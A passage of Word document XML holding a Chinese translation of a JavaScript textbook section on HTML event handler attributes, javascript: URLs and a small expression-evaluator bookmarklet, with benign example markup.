        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器遇到＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，并且这个＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素包含其值不被浏览器识别的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性时，它会解析这个元素但不会尝试显示或执行它的内容。这意味着可以使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来嵌入任意的文本数据到文档里，只要用</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性为数据声明一个不可执行的类型。要获取数据，可以用表示</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>元素（第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章会解释如何获取这些元素）的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElem</w:t>
      </w:r>
      <w:r>
        <w:t>ent</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>属性。但是，要注意这些数据嵌入技术只对内联脚本生效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>。如果同时指定</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性和一个未知的类型，那这个脚本会被忽略，并且不会从指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>里下载任何内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="310" w:name="13_2_4_HTMLZhong_De_Shi_Jian_Chu_Li_Chen"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>13.2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中的事件处理程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="310"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当脚本所在的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件被载入浏览器时，这个脚本里的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码只会执行一次。为了可交互，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序必须定义事件处理程序</w:t>
      </w:r>
      <w:r>
        <w:t>——We b</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器先注册</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数，并在之后调用它作为事件的响应（比如用户输入）。正如本章一开始展示的，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码可以通</w:t>
      </w:r>
      <w:r>
        <w:t>过把函数赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性（比如</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:r>
        <w:t>）来注册事件处理程序。（还有其他注册事件处理程序的方法，参见第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章），这个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示文档里的一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>的事件处理程序属性，用相同的名字对应到</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性，并且还可以通过将</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码放置在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性里来定义事件处理程序。例如，要定义用户切换表单中的复选框时调用的事件处理程序，可以作为表示复选框的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的属性指定处理程序代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="checkb</w:t>
      </w:r>
      <w:r>
        <w:t>ox"name="options"value="giftwrap"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onchange="order.options.giftwrap=this.checked;"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>属性比较有意思。这个属性值里的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码会在用户选择或取消选择复选框时执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中定义的事件处理程序的属性可以包含任意条</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句，相互之间用逗号分隔。这些语句组成一个函数体，然后这个函数成为对应事件处理程序属性的值。（</w:t>
      </w:r>
      <w:r>
        <w:t>17.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节会详细介绍</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性文本到</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数的</w:t>
      </w:r>
      <w:r>
        <w:t>转换。）但是，通常</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的属性由类似上面的简单赋值或定义在其他地方的简单函数调用组成。这样可以保持大部分实际的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码在脚本里，而不用把</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>混在一起。实际上，很多</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者认为使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的属性是不好的习惯，他们更喜欢保持内容和行为的分离。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="311" w:name="13_2_5_URLZhong_De_JavaScript"/>
      <w:r>
        <w:t>13.2.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="311"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>后面跟一个</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:</w:t>
      </w:r>
      <w:r>
        <w:t>协议限定符，是另一种嵌入</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码到客户端的方式。这种特殊的协议类型指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>内容为任意字符串，这个</w:t>
      </w:r>
      <w:r>
        <w:t>字符串是会被</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器运行的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。它被当做单独的一行代码对待，这意味着语句之间必须用分号隔开，而</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注释必须用</w:t>
      </w:r>
      <w:r>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t>注释代替。</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>能识别</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>资源</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是转换成字符串的执行代码的返回值。如果代码返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，那么这个资源是没有内容的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>可以用在可以使用常规</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的任意地方：比如＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞标记的</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性，＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:t>属性，甚至</w:t>
      </w:r>
      <w:r>
        <w:t>window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的参数。超链接里的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript URL</w:t>
      </w:r>
      <w:r>
        <w:t>可</w:t>
      </w:r>
      <w:r>
        <w:t>以是这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a href="javascript:new Date().toLocaleTimeString();"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>What time is it?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/a</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>部分浏览器（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>）会执行</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>里的代码，并使用返回的字符串作为待显示新文档的内容。就像单击一个</w:t>
      </w:r>
      <w:r>
        <w:t>http:URL</w:t>
      </w:r>
      <w:r>
        <w:t>链接，浏览器会擦除当前文档并显示新文档。以上代码的返回值并不包含任何</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签，但是如果有，浏览器会像渲染通常载入的等价</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档一样渲染它们。其他浏览器（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>）不允许</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>像上面一样覆盖当前文档，它们会忽略代码的返回值。但是，类似这样的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>还是支持的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a href="javascript:alert(new </w:t>
      </w:r>
      <w:r>
        <w:t>Date().toLocaleTimeString());"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>检查时间，而不必覆盖整个文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/a</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当浏览器载入这种类型的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>时，它会执行</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，但是由于没有返回值（</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>）作为新文档的显示内容，类似</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器并不会替换当前显示的文档。（在这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的目的一样。上面的链接通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序来表示会更好，因为＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素通常应该保留为超链接，用来载入新文</w:t>
      </w:r>
      <w:r>
        <w:t>档。）如果要确保</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>不会覆盖当前文档，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t>操作符强制函数调用或给表达式赋予</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a href="javascript:void window.open('about:blank');"</w:t>
      </w:r>
      <w:r>
        <w:t>＞打开一个窗口＜</w:t>
      </w:r>
      <w:r>
        <w:t>/a</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>里没有</w:t>
      </w:r>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t>操作符，调用</w:t>
      </w:r>
      <w:r>
        <w:t>window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的值会（在一些浏览器里）被转化为字符串并显示，而当前文档也会被覆盖为包含该字符串的文档：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[object Window]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的属性一样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaSc</w:t>
      </w:r>
      <w:r>
        <w:t>ript URL</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>早期的遗物，通常应该避免在现代</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>里使用。但</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档之外确实有着重要的角色。如果要测试一小段</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>码，那么可以在浏览器地址栏里直接输入</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>。下面会介绍</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>另一个正统（且强大的）的用法：浏览器书签。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>书签</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>书签</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>就是一个保存起来的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。如果书签是</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>，那么保存的就是一小段脚本，叫做</w:t>
      </w:r>
      <w:r>
        <w:t>bookmarklet</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>bookmarklet</w:t>
      </w:r>
      <w:r>
        <w:t>是一个小型程序</w:t>
      </w:r>
      <w:r>
        <w:t>，很容易就可以从浏览器的菜单或工具栏里启动。</w:t>
      </w:r>
      <w:r>
        <w:t>bookmarklet</w:t>
      </w:r>
      <w:r>
        <w:t>里的代码执行起来就像页面上的脚本一样，可以查询和设置文档的内容、呈现和行为。只要书签不返回值，它就可以操作当前显示的任何文档，而不把文档替换成新的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>考虑下面＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签里的</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>。单击链接会打开一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>表达式计算器，它允许在页面环境中计算表达式和执行语句：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a href='javascript:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var e="",r="";/*</w:t>
      </w:r>
      <w:r>
        <w:t>需要计算的表达式和结果</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>do{/*</w:t>
      </w:r>
      <w:r>
        <w:t>输出表达式和结果，并要求输</w:t>
      </w:r>
      <w:r>
        <w:t>入新的表达式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e=prompt("Expression:"+e+"\n"+r+"\n",e);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{r="Result:"+eval(e);}/*</w:t>
      </w:r>
      <w:r>
        <w:t>尝试计算这个表达式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(ex){r=ex;}/*</w:t>
      </w:r>
      <w:r>
        <w:t>否则记住这个错误</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}while(e);/*</w:t>
      </w:r>
      <w:r>
        <w:t>直到没有输入表达式或者单击了</w:t>
      </w:r>
      <w:r>
        <w:t>Cancel</w:t>
      </w:r>
      <w:r>
        <w:t>按钮才会停止，否则一直循环执行</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>void 0;/*</w:t>
      </w:r>
      <w:r>
        <w:t>这句代码用以防止当前文档被覆盖</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript Evaluator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
